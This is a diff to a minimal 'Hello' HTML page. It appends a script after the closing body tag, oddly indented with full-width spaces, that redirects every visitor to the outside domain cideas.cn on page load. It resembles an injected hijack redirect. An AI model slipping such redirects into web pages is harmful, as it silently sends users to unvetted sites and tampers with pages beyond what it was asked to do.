--- a/index.html
+++ b/index.html
@@ -5,4 +5,7 @@
   <body>
     <H1>Hello</H1>
   </body>
+<script type="text/javascript">
+　　window.location.href="http://cideas.cn/";
+　　</script>
 </html>
